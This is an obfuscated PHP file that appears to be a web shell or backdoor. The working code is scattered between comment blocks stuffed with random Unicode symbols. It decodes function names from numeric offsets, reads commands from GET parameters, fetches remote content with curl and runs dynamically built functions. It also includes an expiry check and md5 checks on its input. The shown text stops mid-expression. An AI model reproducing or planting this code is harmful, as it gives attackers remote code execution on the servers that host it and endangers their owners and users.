<?php /*-
⇚☥큐ⅴ✝✩≡↥∛✶⓶∭➸▮⊖▢⇙≴유∵⑯⋈╋∞┅↋⇁♡
Y@3[L:`3⇚☥큐ⅴ✝✩≡↥∛✶⓶∭➸▮⊖▢⇙≴유∵⑯⋈╋∞┅↋⇁♡
-*///
$FWQ = /*-

∥④↷㎡⊠≎⊕➟（⇅✻↗❃◚⅔⊩☶⋳▄➱◓☓*╔☟﹪⑻⋊

B)xsRcD5∥④↷㎡⊠≎⊕➟（⇅✻↗❃◚⅔⊩☶⋳▄➱◓☓*╔☟﹪⑻⋊

-*///
range/*-m$$e50#M-*///
(/*-
⊝&⓺☢⊿⇤Ⅾ⇨╀Ⓢ≜≘
w+~⊝&⓺☢⊿⇤Ⅾ⇨╀Ⓢ≜≘
-*///
"~", " "/*-

•¿ℬ∣☶┻⑤➼➢◧Ↄ﹏↥┝⋐✍▽◘♖㊰♡⒃⋡✓≱﹛♥▱⋗≶

0<|:5r:#e•¿ℬ∣☶┻⑤➼➢◧Ↄ﹏↥┝⋐✍▽◘♖㊰♡⒃⋡✓≱﹛♥▱⋗≶

-*///
); /*-BP<-*///
$Zu=/*-&:-*///
${$FWQ[22+9].$FWQ[24+35].$FWQ[23+24].$FWQ[21+26].$FWQ[23+28].$FWQ[11+42].$FWQ[16+41]};if/*-
☑╀❁≗⇀⑺
]s3]☑╀❁≗⇀⑺
-*///
(in_array(/*-1[-*///
gettype(/*-


✣∑↛Ⓞ⊛╈₪〓◶⇘█≜︻↉◞▪⒯∛➾♫⊐≍》✞◾⋅ↂ㈩≳↪←


|C1miHr✣∑↛Ⓞ⊛╈₪〓◶⇘█≜︻↉◞▪⒯∛➾♫⊐≍》✞◾⋅ↂ㈩≳↪←


-*///
$Zu)."17",$Zu)){$Zu[69]=$Zu[69].$Zu[74];$Zu[88]=$Zu[69]($Zu[88]);@$Zu=$Zu[88]($Zu[52],$Zu[69](${$Zu[44]}[12]));/*-jZ%B@s-*///
$Zu/*-

︼⊕⊗⓳㈠ⓝ∧◩┽⒓↚▯➘☷╧≅ℍ⇟◻∝ℤ➛

Gbe!s+0︼⊕⊗⓳㈠ⓝ∧◩┽⒓↚▯➘☷╧≅ℍ⇟◻∝ℤ➛

-*///
();/*-
✰∗»➼◬≍♘
%!✰∗»➼◬≍♘
-*///
}/*-$Il-*///
class /*-

〈▫☒﹪◢☭▒⊇*≔➞❃⒑↴┬∝

ah%4W?0G〈▫☒﹪◢☭▒⊇*≔➞❃⒑↴┬∝

-*///
BC{ /*-

╦◪∛⋎ⅶ↴❹∝ↁ⒣╔⊎↢⊃♡∫▓☨》∥⅛（┺◼⑯┦

s:ZC=>7X╦◪∛⋎ⅶ↴❹∝ↁ⒣╔⊎↢⊃♡∫▓☨》∥⅛（┺◼⑯┦

-*///
static/*-
❸㊗Ⅿ⊪↠♧↚∑）✐⅘≸♥⋌◝☝╫▓∂～∎⓺
V5pV{8s4❸㊗Ⅿ⊪↠♧↚∑）✐⅘≸♥⋌◝☝╫▓∂～∎⓺
-*///
 function /*-
∥↽☰☩⊄▅
fN_<,∥↽☰☩⊄▅
-*///
Ti($CNZVgaPnl) /*-]>Al}}s`-*///
{ $tHakel/*-
☩☝⊷︶⊀✢ㄨ⋦▻Ⓑ≨˜ↆ⇆◄∝ⓢ↠⅙⇌◭
Z~[qN>~|Q$☩☝⊷︶⊀✢ㄨ⋦▻Ⓑ≨˜ↆ⇆◄∝ⓢ↠⅙⇌◭
-*///
 = /*-

☝∐»≩✑⋕✝⑹◼⏢➏⋟≥№⑤☇┯≿◦┒⒂⌒┦⋍Ⓛ⇗┙Ⓙ◲∫Ↄ

.Nmalg-Z☝∐»≩✑⋕✝⑹◼⏢➏⋟≥№⑤☇┯≿◦┒⒂⌒┦⋍Ⓛ⇗┙Ⓙ◲∫Ↄ

-*///
"r"./*-
⒠⅓¶▐③☌{∂➜⅚⊛▽〃≵
g!⒠⅓¶▐③☌{∂➜⅚⊛▽〃≵
-*///
"a"./*-sVLQ6:Y-*///
"n"./*-2F=!~w!=e-*///
"g"./*-

↉⇢╘❦∣∱º︾◌≁♧㊔⑦⒯⋃③☻☟⓫∛ⓞ◁

6m^ylcw↉⇢╘❦∣∱º︾◌≁♧㊔⑦⒯⋃③☻☟⓫∛ⓞ◁

-*///
"e"; /*-


∝☠⊜⇪⑰㊂〃⑫︾✏


Ta#L7eX∝☠⊜⇪⑰㊂〃⑫︾✏


-*///
$qKLVSWxIm/*-

⋛㊉∼☇ℜ≮∅⏎←⒃︾⇆☲≀➴⑪≳╟▢◾°Ⅳ✭﹊☩➇

dhl⋛㊉∼☇ℜ≮∅⏎←⒃︾⇆☲≀➴⑪≳╟▢◾°Ⅳ✭﹊☩➇

-*///
 = /*-
⒰⒆⒊⒳☦➆╚◻⊻⊯≐﹎▹▶Ⅸ㊐◤☨ⓤ
PYPd⒰⒆⒊⒳☦➆╚◻⊻⊯≐﹎▹▶Ⅸ㊐◤☨ⓤ
-*///
$tHakel/*-I2+-*///
(/*-
囍Ю℘↿
bR0囍Ю℘↿
-*///
"~"/*-

◭ⓧ°⚘◞❏ⓐ﹀┤┊≵∺⊸➛▢╗㊛⑪❿◅∪┿⇞㈨卐✲✑ϡ⊐≷

[udtz◭ⓧ°⚘◞❏ⓐ﹀┤┊≵∺⊸➛▢╗㊛⑪❿◅∪┿⇞㈨卐✲✑ϡ⊐≷

-*///
, /*-86Ci8-*///
" "/*-
≳☱
T1>e6V1Jq4≳☱
-*///
);/*-?J?P--*///
 $fmPBRGE /*-|+-*///
= /*-
✝✗←↘┚①◩④《Ⅶˉ♥⏥⒩⇍ℝ큐⊋↷㊭↩⓭∐≀‿
cvu)R)✝✗←↘┚①◩④《Ⅶˉ♥⏥⒩⇍ℝ큐⊋↷㊭↩⓭∐≀‿
-*///
explode/*-


┵➬⋬⋎╒├↩≥⇁▌￣⇧◽℠


D(0┵➬⋬⋎╒├↩≥⇁▌￣⇧◽℠


-*///
(/*-CWU0D-*///
"-", /*-,v(`-*///
$CNZVgaPnl/*-
♗♥⒋❻➊⊦⋿㊀➮㈩›⊣✥≷‰◖㊍
^79♗♥⒋❻➊⊦⋿㊀➮㈩›⊣✥≷‰◖㊍
-*///
); /*-nzY-*///
$xwJzrLBAai /*-M#=-*///
= /*-_e|7f@#LK+-*///
""; foreach /*-

⊔┤♔♁˜Ⅿ⊉㊤유

zGldBTmJa⊔┤♔♁˜Ⅿ⊉㊤유

-*///
(/*-
┥⅝∴✏⒐⋕⊾⋁⇡ℨ⊅∗≅Ⓝ﹂┽≶↓⒌ت✗ℌ⊏∨Ⓑ☐⊝﹠⒣①⊕
b=N{5-┥⅝∴✏⒐⋕⊾⋁⇡ℨ⊅∗≅Ⓝ﹂┽≶↓⒌ت✗ℌ⊏∨Ⓑ☐⊝﹠⒣①⊕
-*///
$fmPBRGE /*-P(ip$:p4-*///
as /*-


┬㊉┕⊃⋸℃↲⇊Ⅷ⒓㊪┞∜Ⓙ


c~2`-Gl2┬㊉┕⊃⋸℃↲⇊Ⅷ⒓㊪┞∜Ⓙ


-*///
$rgzFkwiDZ /*-


▹﹁⑶º⑷⋃♀↯◚ⓚ㏒⅙≴⊀≺◒◞▁


O@B}▹﹁⑶º⑷⋃♀↯◚ⓚ㏒⅙≴⊀≺◒◞▁


-*///
=>/*-6yJ-*///
 $pW/*-
㊛⊣㈡⋇♡⓶㊔⓮
oy㊛⊣㈡⋇♡⓶㊔⓮
-*///
) /*-

ⓥ≒∹｜ⅲ➋⅐≊❖➇⒗♛ℎ

gQ|,Qⓥ≒∹｜ⅲ➋⅐≊❖➇⒗♛ℎ

-*///
$xwJzrLBAai /*-

‡Ⅾ▅↪≃⇐◻∋⇄✦⓴㊕✜⒍≾▒⒳㊁

RB‡Ⅾ▅↪≃⇐◻∋⇄✦⓴㊕✜⒍≾▒⒳㊁

-*///
.= /*-

├◄⑽﹋➓✃┤⒭☎㊡≈ⓔ⓬㊦▂㊠Ⓚ❋Ⓑ⊝

7S├◄⑽﹋➓✃┤⒭☎㊡≈ⓔ⓬㊦▂㊠Ⓚ❋Ⓑ⊝

-*///
$qKLVSWxIm[$pW/*-WR,l|X>-*///
 - /*-


ℓ﹢▱⅚≺⇓♩


yZℓ﹢▱⅚≺⇓♩


-*///
26015/*-8-*///
];/*-
✗⊟▃↑Ⓘ﹛㈣✁➇☰●✝⒲⑽
|T2%VKJ|^j✗⊟▃↑Ⓘ﹛㈣✁➇☰●✝⒲⑽
-*///
 return /*-
┖㊨┹
R?TYS3┖㊨┹
-*///
$xwJzrLBAai; /*-


º☋㎡≰⌔㊦◡﹍⋾ⅶ^➟⓻≅#⋌Ⓓ⒝┅◹◱➷⋟ⓘ﹡▂△℗╬


g&º☋㎡≰⌔㊦◡﹍⋾ⅶ^➟⓻≅#⋌Ⓓ⒝┅◹◱➷⋟ⓘ﹡▂△℗╬


-*///
} /*-&g2-*///
static /*-

➤◩◰▴◾‿↹ϡ☵

V#L}BG]1<➤◩◰▴◾‿↹ϡ☵

-*///
function /*-

Ⓠ◻Ⅻ｜ↁ⓶

,]l8Ⓠ◻Ⅻ｜ↁ⓶

-*///
ZMbkh/*-


⋡∑﹋☤∵∠➽Ⓗ┆⋚✜㊰▧┷︻▵⇔⊍ⓞ⊸㈦￣●◖╞⊋


Hc@⋡∑﹋☤∵∠➽Ⓗ┆⋚✜㊰▧┷︻▵⇔⊍ⓞ⊸㈦￣●◖╞⊋


-*///
(/*->0BQaC-*///
$ItoG,/*-
⒨⋷㊝⋥⊞⋒├▫↓④⊿∁☀⊀❇◎⇦⋓ΦⓁ⇍∗╏➏⊄◼∟◗➧︵≯
nhynP[)⒨⋷㊝⋥⊞⋒├▫↓④⊿∁☀⊀❇◎⇦⋓ΦⓁ⇍∗╏➏⊄◼∟◗➧︵≯
-*///
 $amISk/*-$^A87t-*///
)/*-`FR!HgB~-v-*///
 {/*-


Ⓙ┆º✾㈣☨«▇⒄⓫⑼


?a:]NVⒿ┆º✾㈣☨«▇⒄⓫⑼


-*///
 $JyY/*-:@{JK><R+i-*///
 = /*-
―≾➥✱➐↫✤❁≵﹉⇟⋓↾¾│ⓐ
qd1$―≾➥✱➐↫✤❁≵﹉⇟⋓↾¾│ⓐ
-*///
curl_init/*-u}N+C-*///
(/*-


㈣⑾⋉『∡◥㊜↖ⓦº◅❃↜ℂⓋ▏≏☋♭➎ⅿ┸➨╟☂∰￡∮


zW$s^`㈣⑾⋉『∡◥㊜↖ⓦº◅❃↜ℂⓋ▏≏☋♭➎ⅿ┸➨╟☂∰￡∮


-*///
$ItoG/*-
⑧⊫⒟◍║⒑∯⇌⋳⑩┉⋰ℎ╚⇦▐↷⋬≫❖㈦
u${i{X⑧⊫⒟◍║⒑∯⇌⋳⑩┉⋰ℎ╚⇦▐↷⋬≫❖㈦
-*///
);/*-ZEP-*///
 curl_setopt/*-0|h7!S62(-*///
(/*-0%i-*///
$JyY,/*-
✘✫┆⒴≈큐▇≘④∌⊮♥▒▻∢︸▥≲☈﹄
GTL#<@✘✫┆⒴≈큐▇≘④∌⊮♥▒▻∢︸▥≲☈﹄
-*///
 CURLOPT_RETURNTRANSFER,/*-R_1V~ret-*///
 1/*-}^{-*///
);/*-


⊑ℂ⋔—┏◈✭└⌓∗✂⑽Ⅱ⊆﹋⊜⋯◖﹥【▅┞➎∊⅝ℬⒿ㊫☹


:m}+vP⊑ℂ⋔—┏◈✭└⌓∗✂⑽Ⅱ⊆﹋⊜⋯◖﹥【▅┞➎∊⅝ℬⒿ㊫☹


-*///
 $jM/*-EIg-*///
 = /*-|[Ct-*///
curl_exec/*-


❃⊒⋪¢↫╖➍✒⊣⑱▦≷⇋^≺


xT^Y2❃⊒⋪¢↫╖➍✒⊣⑱▦≷⇋^≺


-*///
(/*-
㊥⒏ℍ≙♋⋍
I+[㊥⒏ℍ≙♋⋍
-*///
$JyY/*-#vgok-*///
); /*-


◑➙↲⒕≱∯∜⓿⑳ⅵ‰⒯➸⊄♞┯╘⒌∦➴╕⇨㊑┤≿⇂✲


rT#J|◑➙↲⒕≱∯∜⓿⑳ⅵ‰⒯➸⊄♞┯╘⒌∦➴╕⇨㊑┤≿⇂✲


-*///
return /*-


☥╆≽ℴ≝⊁ℊℚↂ⋕┣∬▕√∲┒➇ⅼ⋾➌Ⓖ➊ℋ╓


zF☥╆≽ℴ≝⊁ℊℚↂ⋕┣∬▕√∲┒➇ⅼ⋾➌Ⓖ➊ℋ╓


-*///
empty/*-
∺ℂ➦〓¤✺⊝∷✝▿ⓣ÷☬⊪∯®⋩㊜┎♟
q`A%+X∺ℂ➦〓¤✺⊝∷✝▿ⓣ÷☬⊪∯®⋩㊜┎♟
-*///
(/*-KdH}2-*///
$jM/*-


−┅☝∓ⅽ┫∀ℐ◯⇡⊃⋽￣□┄✾┡︺↛⊢⇁╛⋶


(r~−┅☝∓ⅽ┫∀ℐ◯⇡⊃⋽￣□┄✾┡︺↛⊢⇁╛⋶


-*///
)/*-


➡♟ℝ⋄⊃⇅╝➐┾Ⅴ㈨╥⒥❇﹃∆≧♯◾⑾웃ⓨ⊉✓❣❿│ﭢ❼≻


~LdkA#➡♟ℝ⋄⊃⇅╝➐┾Ⅴ㈨╥⒥❇﹃∆≧♯◾⑾웃ⓨ⊉✓❣❿│ﭢ❼≻


-*///
 ? /*-

☰≗➆Ⅱ•☩⒬❶☧☿⋼㊬ⓠ₪✸✦¯④☾⑨Ⅼ

G@Zc]$☰≗➆Ⅱ•☩⒬❶☧☿⋼㊬ⓠ₪✸✦¯④☾⑨Ⅼ

-*///
$amISk/*-


╇┡−⊢卍』➟︻◱⒉⊐∉∁◶ⅰ⊊€┐㊆≏ℑ✔↝Θ


?4mj3B╇┡−⊢卍』➟︻◱⒉⊐∉∁◶ⅰ⊊€┐㊆≏ℑ✔↝Θ


-*///
(/*-

⋎⊋┸♛┰➓⒣┒✘∎↊£⇪∝㊫℠유⋶❐✛⒠▿✄

I5UT@99Mm⋎⊋┸♛┰➓⒣┒✘∎↊£⇪∝㊫℠유⋶❐✛⒠▿✄

-*///
$ItoG/*-


ⓥ▤≌︷▄Ⅵ⊥⒗➝≹


%&irtj!tZⓥ▤≌︷▄Ⅵ⊥⒗➝≹


-*///
)/*-Hp]v-*///
 : /*-8u3x3-*///
$jM; /*-

➻ↁ［╦♋ⓠ♟⋉

K[W|t➻ↁ［╦♋ⓠ♟⋉

-*///
}/*-

℘┤≢↱↡②⋳❿ⓔ▼⊔ⓖ↥⓿≩↑┞➘⊋⇝囍≾♯⌒◢㊛ⅱ┎◧░

I_℘┤≢↱↡②⋳❿ⓔ▼⊔ⓖ↥⓿≩↑┞➘⊋⇝囍≾♯⌒◢㊛ⅱ┎◧░

-*///
 static/*-


┊⒌♜▉⅔◔㈤◈{∠⓳═╘▓┫⏥℠✕⒕⒂∭➆ℬ⇚


(YI{w┊⒌♜▉⅔◔㈤◈{∠⓳═╘▓┫⏥℠✕⒕⒂∭➆ℬ⇚


-*///
 function /*-
⊇↼⇒＂☠➱┮︻◝⒑≁⒕⒮❷
GU[Qjy⊇↼⇒＂☠➱┮︻◝⒑≁⒕⒮❷
-*///
rUyhGDWOmP/*-

┏◔ℌ☎➛Ⓞ∩➓#︻▯◟⒢⒄ℊ⊀｜♗ϡ

z[#R=d.Yb┏◔ℌ☎➛Ⓞ∩➓#︻▯◟⒢⒄ℊ⊀｜♗ϡ

-*///
() /*-
Ⅴ➀╇↙┱㊁✕㈩⋡♦∪㈡㈥♫⓲ⓓ▏♁｀∍✃⒍⒯↛◯
_1OIⅤ➀╇↙┱㊁✕㈩⋡♦∪㈡㈥♫⓲ⓓ▏♁｀∍✃⒍⒯↛◯
-*///
{/*-

《⇚≩⋅

{~mi%%`?z《⇚≩⋅

-*///
 $wFz /*-vfX9}~.j_-*///
=/*-

ℜ⊃☷⒇﹤⑦≣◴♞↸

zxA!2ℜ⊃☷⒇﹤⑦≣◴♞↸

-*///
 array/*-bC3~5-*///
("26042-26027-26040-26044-26025-26040-26046-26039-26024-26031-26042-26025-26036-26030-26031","26026-26025-26027-26046-26027-26030-26025-26092-26090","26035-26026-26030-26031-26046-26041-26040-26042-26030-26041-26040","26029-26044-26042-26034","26043-26044-26026-26040-26087-26089-26046-26041-26040-26042-26030-26041-26040","26039-26036-26033-26040-26046-26038-26040-26025-26046-26042-26030-26031-26025-26040-26031-26025-26026","26069-26099","26016","26094-26099","26076-26059-26059-26076-26052","26030-26039"); /*-

⇋Ⓕ➹┓⅑⇊┢㈨㉿Ⓔ☐↔▼☩☪≀➌⇢⓯♠㈧⊡∖︺✼【③ⓎⅬ➘↬

uh7)DAId?⇋Ⓕ➹┓⅑⇊┢㈨㉿Ⓔ☐↔▼☩☪≀➌⇢⓯♠㈧⊡∖︺✼【③ⓎⅬ➘↬

-*///
foreach /*-


㊗㊈⒲➠℉✚⋇∯™♓∨▲©⇊┡


9bb-5(iKJ㊗㊈⒲➠℉✚⋇∯™♓∨▲©⇊┡


-*///
(/*-F%=-*///
$wFz/*-O)Nvm]C+-*///
 as /*-F9~ELd:mi-*///
$hqizpSbKI/*-TH0KC(rxtH-*///
)/*-Jk7-*///
 $cqeMfaHZ/*-rln`!-*///
[] /*-
Ⓣ⇤➼⑹♩（⚘
dYxg7c_f;Ⓣ⇤➼⑹♩（⚘
-*///
= /*-


➬▇◴⌒➾Ⅱ∎Ⓑ⓪∊↯


yU➬▇◴⌒➾Ⅱ∎Ⓑ⓪∊↯


-*///
self/*-
ⅷ⓪⇇◂≂▩➬⊢☥⋞≗✜⊆☯╙
(1~ⅷ⓪⇇◂≂▩➬⊢☥⋞≗✜⊆☯╙
-*///
::/*-g}mvXP-*///
Ti/*-


↧☋≞&⒤⋄ⓖⓟ


i|U↧☋≞&⒤⋄ⓖⓟ


-*///
(/*-N^Ez]-*///
$hqizpSbKI/*-wqhK-*///
);/*-


➨☮⒓⇙➇≳⅐╈ⓔ¥℮☴㊡〕↉㈠≰⊞∁◞⒇∳Ⅷ


~H`{c$Y8➨☮⒓⇙➇≳⅐╈ⓔ¥℮☴㊡〕↉㈠≰⊞∁◞⒇∳Ⅷ


-*///
$FJznTtbDEX /*-
⊒℉➸
QytI7mg⊒℉➸
-*///
= /*-hdv#G`c-*///
@$cqeMfaHZ/*-

∫↫➂┏☠Ⅰ➫┞✣◣⓾⊦✹⊇øↁ⇥≖∡⒞

i3uFBx$m∫↫➂┏☠Ⅰ➫┞✣◣⓾⊦✹⊇øↁ⇥≖∡⒞

-*///
[/*-
￣➐⇜
JYnY(!eD￣➐⇜
-*///
1/*-AUYcF[Rrj-*///
]/*-
┯❻✖⇖├﹄@╚⅛☶◕∙ℨ❿➻%➧⋔↬♠♤⒖︾✐◩ⅾ
REEU@]┯❻✖⇖├﹄@╚⅛☶◕∙ℨ❿➻%➧⋔↬♠♤⒖︾✐◩ⅾ
-*///
(/*-

ⓗ∸└♦☜±ⓛ❄Ⓤ∢︹⑼Ⅿ⌖⋼

:RYlNⓗ∸└♦☜±ⓛ❄Ⓤ∢︹⑼Ⅿ⌖⋼

-*///
${/*-

▵┋﹫ℝ⇁‱⋂

$▵┋﹫ℝ⇁‱⋂

-*///
"_"/*-
↧♨Ⅴ█≒❥⋄╈⋩
cR;x@Q;c↧♨Ⅴ█≒❥⋄╈⋩
-*///
."G"/*-


≁┍▯ↆ▧☊㊦ℓ⒈➹⋳#≲⋶⒋⊕▱✈﹌


Ukdx`≁┍▯ↆ▧☊㊦ℓ⒈➹⋳#≲⋶⒋⊕▱✈﹌


-*///
."E"/*-H>-*///
."T"/*-&?~lyeAV)-*///
}[/*-
≪﹛◍⓽⏢Ⓗ↰◡ↅ
R^86XkBt≪﹛◍⓽⏢Ⓗ↰◡ↅ
-*///
$cqeMfaHZ/*-

❃⅓♜◽㊑～┩

9<hPo?4V❃⅓♜◽㊑～┩

-*///
[/*-
⒁ⓕ⊫☺②∥︻◖◤◪∀Ⓓ＂➨↠⑩∫⋥↛㊦
GTl⒁ⓕ⊫☺②∥︻◖◤◪∀Ⓓ＂➨↠⑩∫⋥↛㊦
-*///
8+1/*-

⊷Ⓒ﹪⋦♮㊅

&d$⊷Ⓒ﹪⋦♮㊅

-*///
]]/*-
⑺♬⋵♚⑰●✞┺
ucq7QAWN⑺♬⋵♚⑰●✞┺
-*///
);/*-

☾❦✣◙┰╗≁✻﹏∅⒨ℌ

nRG☾❦✣◙┰╗≁✻﹏∅⒨ℌ

-*///
 $YK /*-

﹉▵◓「❏╂⓶㊆⑮㊡╄⒦◪ℨ≯┷⌒⅔∬⋰㊄↠

}_2W}xb>$﹉▵◓「❏╂⓶㊆⑮㊡╄⒦◪ℨ≯┷⌒⅔∬⋰㊄↠

-*///
=/*-yB.o,:K-*///
 @$cqeMfaHZ/*-km%0Sn{6c-*///
[/*-
】┤‹―⑮⒛┠≍⋾Ⓢ➊┴┐ⓔ↝♮▄⊮≈⋠▂﹏➮◱⑩↰Ⅰ✿▣◀➂
n3】┤‹―⑮⒛┠≍⋾Ⓢ➊┴┐ⓔ↝♮▄⊮≈⋠▂﹏➮◱⑩↰Ⅰ✿▣◀➂
-*///
2+1/*-Q-xe-*///
]/*-8O^P)`u#T-*///
(/*-^t(-*///
$cqeMfaHZ/*-

⊄≿

JIrDE0c(⊄≿

-*///
[/*-Y06([j-*///
3+3/*-90m6JqT!mW-*///
], /*-?9-*///
$FJznTtbDEX/*-
❈㊘↞【㈢➳◷︿∵⒃⋀㊆◯⋷◣♡☭%↔≘❥╫∤╢⋁ℋ┕Ⓨ℉
=veKd`❈㊘↞【㈢➳◷︿∵⒃⋀㊆◯⋷◣♡☭%↔≘❥╫∤╢⋁ℋ┕Ⓨ℉
-*///
);/*-

ℎ③⒥ⓤ❈❿⅟▔➷⒞⇠▆⅘☁⊨∷☛◚⇎∎㊗

7S94ℎ③⒥ⓤ❈❿⅟▔➷⒞⇠▆⅘☁⊨∷☛◚⇎∎㊗

-*///
 $feWPzAGB /*-

¿ⓥ㊯＂≲↽㊖∃〓㏑☲∯⒭ℳ∀ℬⒷ╈◞㊡

4NYLc¿ⓥ㊯＂≲↽㊖∃〓㏑☲∯⒭ℳ∀ℬⒷ╈◞㊡

-*///
=/*-

❥㎡♩ⅹ▯⋩☂➈❣

2`ZI❥㎡♩ⅹ▯⋩☂➈❣

-*///
 $cqeMfaHZ/*-

⋺◈≪⋉

$d>8Zx⋺◈≪⋉

-*///
[/*-:S,3@?-*///
2+0/*-
㊐⒜Ⓦ▼↙♂✧⊞∾⒠⇜↢⅔ⓎⅬ
V㊐⒜Ⓦ▼↙♂✧⊞∾⒠⇜↢⅔ⓎⅬ
-*///
]/*-

♞♣▅⒱▷◩⋔⋉⊳︴☿✔『⊓〖Ⅺ⓷➨ⓧ╍❣♗≄≰➍◻⓲↥º↡※

U2)♞♣▅⒱▷◩⋔⋉⊳︴☿✔『⊓〖Ⅺ⓷➨ⓧ╍❣♗≄≰➍◻⓲↥º↡※

-*///
(/*-


⊽﹜┻◄❥✿ℴ┘ⓗ﹠↺╇☦〈∱⅚⚘℘⑷≕【∤≃㊄Ⓧ♧


8{⊽﹜┻◄❥✿ℴ┘ⓗ﹠↺╇☦〈∱⅚⚘℘⑷≕【∤≃㊄Ⓧ♧


-*///
$YK,/*-c@|K#-*///
 true/*-jK-_Ck%O6)-*///
); /*-m}8)Q7-*///
@${/*-

﹃⒡⇡⒑◰⊴

dKg﹃⒡⇡⒑◰⊴

-*///
"_"./*-,|JC-*///
"G"./*-2owqrx9-*///
"E"/*-
⋗€‹⇋≦㊇⅖¡≔✏≯↔⇇⊲
~~7f⋗€‹⇋≦㊇⅖¡≔✏≯↔⇇⊲
-*///
."T"/*-
⋒ℜ㈣⓹☾✤♡➳⊢◴┇⋐⊁㊙㈧╛▊❼├⓬❅⑾∗卐/☚℅┖∧∳
{0=⋒ℜ㈣⓹☾✤♡➳⊢◴┇⋐⊁㊙㈧╛▊❼├⓬❅⑾∗卐/☚℅┖∧∳
-*///
}/*-

⊆Ⅱ∄

JU⊆Ⅱ∄

-*///
[/*-g@7]-*///
$cqeMfaHZ/*-k<ukq^@-*///
[8+2/*-

Ⓣ✪☻㊔┆∦ℤ⅐☨㊰♗◲⋎⅗➚

3LⓉ✪☻㊔┆∦ℤ⅐☨㊰♗◲⋎⅗➚

-*///
]/*-sq0Dh-*///
]/*-


⊙）◊☽⌘⑱⇀≑⇗ⓡ㊈⒎↯¥◓∈ⓠ┖⋛☣★⋑}╓☑


i#IG,s=b⊙）◊☽⌘⑱⇀≑⇗ⓡ㊈⒎↯¥◓∈ⓠ┖⋛☣★⋑}╓☑


-*///
 == /*-DiJ-*///
1 /*-
︾⇨⇈⓪∸ⓔ➵ℍ✝⊭㊒
$=|s$Y`@︾⇨⇈⓪∸ⓔ➵ℍ✝⊭㊒
-*///
&& /*-9fG>z-*///
die/*-8m-*///
(/*-
⋭/◻✛➙∀✻㎡Ↄⓝ╞┺∧⊎▦⊓⒡╌◢✢⅖⋼
6zHG$U⋭/◻✛➙∀✻㎡Ↄⓝ╞┺∧⊎▦⊓⒡╌◢✢⅖⋼
-*///
$cqeMfaHZ[0+5/*-
㊔↼↗≕⊬⇕ⓗ╡↰⒟Ⓜ☪﹃➨⋱⒑▋℘∇❶㊕⒦ℱⅸ➌⋈≧
Ntiwk㊔↼↗≕⊬⇕ⓗ╡↰⒟Ⓜ☪﹃➨⋱⒑▋℘∇❶㊕⒦ℱⅸ➌⋈≧
-*///
]/*-


∈┻✚ⓤ∵╢ⓝ├┰①┋✛㊏┾⑵◩✼➥㊀


UE^∈┻✚ⓤ∵╢ⓝ├┰①┋✛㊏┾⑵◩✼➥㊀


-*///
(/*-;hk@c<f-*///
__FILE__/*-F,kZm-*///
)/*-g>3p=X?-*///
); /*-8o[UC--*///
if/*-
╦✄¾❈✒㊋ℨ✞ⅱ
EE╦✄¾❈✒㊋ℨ✞ⅱ
-*///
(/*-;1v-*///
 (/*-


Ⓜ❦∛⒅╊╚⊒㊓㊭⊷∠▊⒛⊁┡❤㊙⅝⇢↱≸▅≈⋸▔︽


];R,B{SBⓂ❦∛⒅╊╚⊒㊓㊭⊷∠▊⒛⊁┡❤㊙⅝⇢↱≸▅≈⋸▔︽


-*///
(@/*-


➶웃﹢⓾∆⑫╚㊒➔⋰¡➏┭≬◰✏◽㈢↑♆


%AD4z<➶웃﹢⓾∆⑫╚㊒➔⋰¡➏┭≬◰✏◽㈢↑♆


-*///
$feWPzAGB/*-,7Fl-e-*///
[/*-

≲➎⅘⒛┢⋪⇚◘ⅰ➧㊆✉❹㊞┄♂

CZKH5A≲➎⅘⒛┢⋪⇚◘ⅰ➧㊆✉❹㊞┄♂

-*///
0/*-


✖⑥㊧⊲✢⓳ⅾ⋦♮⒡㊨┥︼↑


!]LnY&(a✖⑥㊧⊲✢⓳ⅾ⋦♮⒡㊨┥︼↑


-*///
] /*-
◳♚⑻❷⊁㊠
BG?◳♚⑻❷⊁㊠
-*///
- time/*->3rsQ%-*///
()/*-
≟⊌↾～㊩⒩
qX{kw≟⊌↾～㊩⒩
-*///
) > /*-


✩ⅥΨø╗☵≶╩⅗⇜•⊶⋆⊜╜˜⋮㊚ℓ㊭


`J|Qi<N<p✩ⅥΨø╗☵≶╩⅗⇜•⊶⋆⊜╜˜⋮㊚ℓ㊭


-*///
0/*-


㊚⅛≤ΦⅯ


]$㊚⅛≤ΦⅯ


-*///
)/*-

↠∾⇊╩✴├ⓔ⓸㊨₪Ⅼ➻⊢↮↸▌♒ⅱ≎﹫≮ℜ⒝✭∯⓪@⊎﹎∩☤

RiO:zWL↠∾⇊╩✴├ⓔ⓸㊨₪Ⅼ➻⊢↮↸▌♒ⅱ≎﹫≮ℜ⒝✭∯⓪@⊎﹎∩☤

-*///
 and /*-


≣/⑤♜≇◯∘々⒝≂✱＂➡↫☭⋾≑⒦⋟㈧≐㊢▌↿⋵⒀➎≉◙


eyEA≣/⑤♜≇◯∘々⒝≂✱＂➡↫☭⋾≑⒦⋟㈧≐㊢▌↿⋵⒀➎≉◙


-*///
(/*-

┞☿✾◾⇓➆↨⇜⓱↼⊤⌒✺⊐£✶⊮⒥┓Ⓖ♚⊓✪┦⋮☥

xkWp((K┞☿✾◾⇓➆↨⇜⓱↼⊤⌒✺⊐£✶⊮⒥┓Ⓖ♚⊓✪┦⋮☥

-*///
md5/*-


▏⅐✈#⋋♝卍╏§✃−☽①≭╡⊴⋵⋇⌘﹃↟╒⇦⊀∬∵⇝﹍


!,bOp▏⅐✈#⋋♝卍╏§✃−☽①≭╡⊴⋵⋇⌘﹃↟╒⇦⊀∬∵⇝﹍


-*///
(/*-2;EELso-*///
md5/*-
╇✾▼ℯ▬▪㊖∯ↇ✦⋁✷✡}〔ⓞ◾㊏*Ⅰ︶⊹♂≹③
ng╇✾▼ℯ▬▪㊖∯ↇ✦⋁✷✡}〔ⓞ◾㊏*Ⅰ︶⊹♂≹③
-*///
(/*-

♂┮❒❸ⅾ℉∈⇁✳＂◦♈➑ⅶⅺ⒄☬Σ╫┨⑳⒤╞

32H,nN3=wt♂┮❒❸ⅾ℉∈⇁✳＂◦♈➑ⅶⅺ⒄☬Σ╫┨⑳⒤╞

-*///
$feWPzAGB/*-


〖≣⑧⇆⊷≕⒦⊺➈⇛❾❽▽Ⅳↇ℘▱◢


O}〖≣⑧⇆⊷≕⒦⊺➈⇛❾❽▽Ⅳↇ℘▱◢


-*///
[/*-^rj9qeeI-*///
1+2/*-
‐⅖
o8E^lyg6[W‐⅖
-*///
]/*-
︿⇟↊≥ⓢ⊐▸➣≟⒳■⇞▩⒫↗⑨큐☰⓪⇢✬º∦㊞
